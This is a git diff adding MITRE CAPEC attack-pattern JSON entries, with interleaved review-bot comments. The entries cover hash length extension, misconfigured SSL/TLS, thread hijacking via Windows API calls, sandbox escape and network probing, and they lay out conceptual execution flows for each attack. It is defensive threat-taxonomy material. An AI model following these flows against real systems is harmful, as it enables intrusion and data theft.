+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_child_of_refs": [
+ "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a"
+ ],
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_example_instances": [
+ "To leverage an attack against the has function extension / padding weakness, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error."
+ ],
+ "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a vulnerable web service: The adversary finds a web service that uses a vulnerable authentication scheme, where an authentication token is concatenated with the parameters of a request and then hashed

  2. Techniques
    Read application documentation to learn about authentication schemes being used
    Observe web service traffic to look for vulnerable authentication schemes

Experiment

  1. Attempt adding padding to parameters: An adversary tests if they can simply add padding to the parameters of a request such that the request is technically changed, with the hash remaining the same

  2. Techniques
    Exploit the hash function extension / padding weakness with only padding to test the weakness

Exploit

  1. Add malicious parameters to request: Add malicious parameters to a captured request in addition to what is already present. Do this by exploiting the padding weakness of the hash function and send the request to the web service so that it believes it is authenticated and acts on the extra parameters.

  2. Techniques
    Exploit the hash function extension / padding weakness by adding malicious parameters to a web service request such that it is still deemed authentic
",
+ "x_capec_extended_description": "\n When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller, when constructing a request, would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, for an adversary to conduct signature forgery by computing the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work on other hash functions such as SHA1.\n ",
+ "x_capec_prerequisites": [
+ "Web services check the signature of the API calls",
+ "Authentication tokens / secrets are shared between the server and the legitimate client",
+ "The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.",
+ "An iterative hash function like MD5 and SHA1 is used.",
+ "An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.",
+ "The communication channel between the client and the server is not secured via channel security such as TLS"
+ ],
+ "x_capec_resources_required": [
+ "\n Access to a function to produce a hash (e.g., MD5, SHA1)\n Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of the original message concatenated with the secret bytes\n "
+ ],
+ "x_capec_skills_required": {
+ "Medium": "Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding."
+ },
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json
new file mode 100644
index 0000000000000000000000000000000000000000..e130716f2873d66d3920e926d31fede80c562885
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json
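Review bot: The CAPEC-461 text under-states the scope of the length-extension weakness: `x_capec_extended_description` says it "will work on other hash functions such as SHA1" and the prerequisite names "MD5 and SHA1", but every plain Merkle–Damgård construction is affected, including SHA-256 (same 512-bit block) and SHA-512 (1024-bit block, so the "multiple of 512 bits" figure is MD5/SHA-1/SHA-256-specific), while SHA-3 and the truncated SHA-512/256 are not. The prerequisite `"The communication channel between the client and the server is not secured via channel security such as TLS"` is also a weak condition: TLS only closes the interception route to `Hash(M)` and `Length(M)`, and the construction remains forgeable by anyone who legitimately receives a signed message, so the note a practitioner wants is that the fix is `HMAC(secret, params)` (or a signature scheme), not transport encryption. The example instance has a typo, "has function extension" should read "hash function extension"; as this is vendored CAPEC 3.9 data, these are best handled as an annotation layer rather than edits to the bundle itself.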
@@ -0,0 +1,67 @@
+{
+ "id": "bundle--5c75dd12-8ad6-4ca6-8e07-aaf506908f2d",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary takes advantage of incorrectly configured SSL/TLS communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-217",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/217.html"
+ },
+ {
+ "external_id": "CWE-201",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/201.html"
+ }
+ ],
+ "id": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "name": "Exploiting Incorrectly Configured SSL/TLS",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_child_of_refs": [
+ "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Gain Privileges"
+ ],
+ "Authorization": [
+ "Gain Privileges"
+ ],
+ "Confidentiality": [
+ "Read Data",
+ "Gain Privileges"
+ ]
+ },
+ "x_capec_domains": [
+ "Communications"
+ ],
+ "x_capec_example_instances": [
+ "Using MITM techniques, an adversary launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the adversary to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur."
+ ],
+ "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of either the server or client being targeted, preferably both. This is not a hard requirement, as the adversary can simply assume commonly exploitable configuration settings and indiscriminately attempt them.

  2. Techniques
    If the target is a webpage, some of the SSL/TLS configuration can be viewed through the browser's security information, such as the key sizes and cipher being used.

Experiment

  1. Intercept Communication: Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94).

  2. Techniques
    Create a malicious webpage that looks identical to the target webpage, but routes client traffic to the server such that the adversary can observe the traffic and perform an adverary in the middle attack.
    If the adversary has access to the network that either the client or server is on, the can attempt to use a packet sniffer to perform an adversary in the middle attack.
    Install a packet sniffer through malware directly to a client device that can intercept SSL/TLS traffic and perform an adversary in the middle attack.

Exploit

  1. Capture or Manipulate Sensitive Data: Once the adversary has the ability to intercept the secure communication, they exploit the incorrectly configured SSL to view the encrypted communication. The adversary can choose to just record the secure communication or manipulate the data to achieve a desired effect.

  2. Techniques
    Use known exploits for old SSL and TLS versions.
    Use known exploits for weak ciphers such as DES and RC4.
",
+ "x_capec_extended_description": "SSL/TLS communications become vulnerable to this attack when they use outdated versions and insecure ciphers. Currently, all SSL versions are deprecated and TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still possible for later versions of TLS to be insecure if they are configured with insecure ciphers such as 3DES or RC4.",
+ "x_capec_likelihood_of_attack": "Low",
+ "x_capec_prerequisites": [
+ "Access to the client/server stream."
+ ],
+ "x_capec_resources_required": [
+ "The adversary needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time."
+ ],
+ "x_capec_skills_required": {
+ "High": "The adversary needs real-time access to network traffic in such a manner that the adversary can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles."
+ },
+ "x_capec_status": "Draft",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json
new file mode 100644
index 0000000000000000000000000000000000000000..d2eb28804d187cd06ff947b00f24ec8a86e7ffa5
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json
@@ -0,0 +1,29 @@
+{
+ "id": "bundle--adc359b7-c606-4cbc-ae52-8c22d081e426",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Embed Virus into DLL. Please refer to this other pattern going forward.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-450",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/450.html"
+ }
+ ],
+ "id": "attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "DEPRECATED: Malware Propagation via USB U3 Autorun",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_status": "Deprecated",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json
new file mode 100644
index 0000000000000000000000000000000000000000..ec381a27f7661e07cd7fa96ea61a6f462137b11e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json
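Review bot: The CAPEC-217 entry is internally inconsistent about which ciphers it considers weak: the Exploit step in `x_capec_execution_flow` says "weak ciphers such as DES and RC4" while `x_capec_extended_description` says "insecure ciphers such as 3DES or RC4", and a consumer keying detections or hardening checks off either string will miss the other. The extended description is the more complete statement and should be the one a loader surfaces; the execution-flow line is better read as `Use known exploits for weak ciphers such as 3DES and RC4.` so both agree. The Experiment techniques also carry two typos, "adverary in the middle" and "the can attempt to use a packet sniffer", which should read "adversary in the middle" and "they can attempt". The example instance is a CBC chained-IV (BEAST-style) recovery of HTTP headers, which is consistent with the TLS 1.0 deprecation statement; since this is vendored upstream data, record these corrections as an overlay rather than editing the bundle.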
@@ -0,0 +1,80 @@ +{ + "id": "bundle--98288ed9-c082-447c-a83d-8ec8669b6f61", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary hijacks a privileged thread of execution by injecting malicious code into a running process. By using a privleged thread to do their bidding, adversaries can evade process-based detection that would stop an attack that creates a new process. This can lead to an adversary gaining access to the process's memory and can also enable elevated privileges. The most common way to perform this attack is by suspending an existing thread and manipulating its memory.", + "external_references": [ + { + "external_id": "CAPEC-30", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/30.html" + }, + { + "external_id": "CWE-270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html" + }, + { + "description": "Process Injection: Thread Execution Hijacking", + "external_id": "T1055.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1055/003" + } + ], + "id": "attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Hijacking a Privileged Thread of Execution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" 
+ ], + "x_capec_example_instances": [ + "Adversary targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target thread: The adversary determines the underlying system thread that is subject to user-control

Experiment

  1. Gain handle to thread: The adversary then gains a handle to a process thread.

  2. Techniques
    Use the \"OpenThread\" API call in Windows on a known thread.
    Cause an exception in a java privileged block public function and catch it, or catch a normal signal. The thread is then hanging and the adversary can attempt to gain a handle to it.
  3. Alter process memory: Once the adversary has a handle to the target thread, they will suspend the thread and alter the memory using native OS calls.

  4. Techniques
    On Windows, use \"SuspendThread\" followed by \"VirtualAllocEx\", \"WriteProcessMemory\", and \"SetThreadContext\".

Exploit

  1. Resume thread execution: Once the process memory has been altered to execute malicious code, the thread is then resumed.

  2. Techniques
    On Windows, use \"ResumeThread\".
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users", + "In order to feasibly execute this class of attacks, the adversary must have the ability to hijack a privileged thread. This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or calling native OS calls that can suspend and alter process memory. This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute." + ], + "x_capec_resources_required": [ + "\n None: No specialized resources are required to execute this type of attack. The adversary needs to be able to latch onto a privileged thread.\n The adversary does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the adversary's malicious code. This is the case even if the adversary conducts the attack remotely.\n " + ], + "x_capec_skills_required": { + "High": "Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json new file mode 100644 index 0000000000000000000000000000000000000000..2d066a3442167129c9c14d3587aac4fbbca9d4e7 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json 
@@ -0,0 +1,82 @@ +{ + "id": "bundle--97f28597-88a4-48e4-88b0-2f7fd1b9e4cd", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.", + "external_references": [ + { + "external_id": "CAPEC-237", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/237.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "J. Cappos, J. Rasley, J. Samuel, I. Beschastnikh, C. Barsan, A. Krishnamurthy, T. 
Anderson, Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code, The 17th ACM Conference on Computer and Communications Security (CCS '10), 2010", + "external_id": "REF-91", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Malware Protection Center: Threat Research and Response, 2007, Microsoft Corporation", + "external_id": "REF-92", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit%3AJava%2FByteVerify.C" + } + ], + "id": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Escaping a Sandbox by Calling Code in Another Language", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. 
The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

  2. Techniques
    The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.
  3. Analysis: The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

  4. Techniques
    The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

Experiment

  1. Verify the exploitable security weaknesses: The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.

  2. Techniques
    The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox.

Exploit

  1. Exploit the security weaknesses in the standard libraries: The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.

  2. Techniques
    The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json new file mode 100644 index 0000000000000000000000000000000000000000..0814eee49beec2c0caf05c53962712c0acd0846c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json 
@@ -0,0 +1,79 @@ +{ + "id": "bundle--c68b39ea-6da1-41f7-abdb-470dc3d630bf", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.", + "external_references": [ + { + "external_id": "CAPEC-325", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Congestion Control Flag (ECN) Probe", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9.json new file mode 100644 index 0000000000000000000000000000000000000000..3216564c011c5d0447c0aac2f5fd38e9fddf1fd0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9.json 
@@ -0,0 +1,29 @@ +{ + "id": "bundle--14e35dda-bc72-4881-b334-43e5e7e1081e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-37 : Retrieve Embedded Sensitive Data. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-205", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/205.html" + } + ], + "id": "attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Lifting credential(s)/key material embedded in client distributions (thick or thin)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json new file mode 100644 index 0000000000000000000000000000000000000000..c9562593b767408bee93750bb3149dcc0860a195 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json 
@@ -0,0 +1,54 @@ +{ + "id": "bundle--d92a6a25-f540-410a-8a08-d5d48c41d28c", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).", + "external_references": [ + { + "external_id": "CAPEC-621", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/621.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Analysis of Packet Timing and Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes." + ], + "x_capec_skills_required": { + "High": "These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json new file mode 100644 index 0000000000000000000000000000000000000000..6bb5690b900de0852fcd876da5dd659c3ae47de6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json 
@@ -0,0 +1,51 @@ +{ + "id": "bundle--f3cf7648-2dac-4332-bee0-f8b7e245d546", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.", + "external_references": [ + { + "external_id": "CAPEC-128", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + } + ], + "id": "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Integer Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6" + ], + "x_capec_prerequisites": [ + "The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.", + "The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers." 
